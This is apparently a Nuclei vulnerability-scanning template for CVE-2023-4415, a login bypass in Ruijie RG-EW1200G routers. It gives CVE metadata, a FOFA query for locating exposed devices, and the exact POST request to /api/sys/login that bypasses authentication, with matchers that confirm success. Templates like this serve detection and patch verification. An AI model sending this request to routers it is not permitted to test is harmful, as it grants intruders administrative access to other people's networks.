id: CVE-2023-4415 info: name: Ruijie RG-EW1200G Router Background - Login Bypass author: DhiyaneshDK severity: high description: | A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4415 - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.00355 epss-percentile: 0.6892 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router http: - method: POST path: - "{{BaseURL}}/api/sys/login" body: | { "username":"2", "password":"admin", "timestamp":1695218596000 } matchers-condition: and matchers: - type: word part: body words: - '"result":"ok"' - '"msg":"登入成功"' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 490a004630440220265c9b5a860e6043464546d6f5a884079ce6303a625a89f2e2334bb3f0dbbf7002207d0654fef16c5e6bef7738ae9053e1ba8b571326706aa88c4f27186faa5d7a50:922c64590222798bb761d5b6d8e72950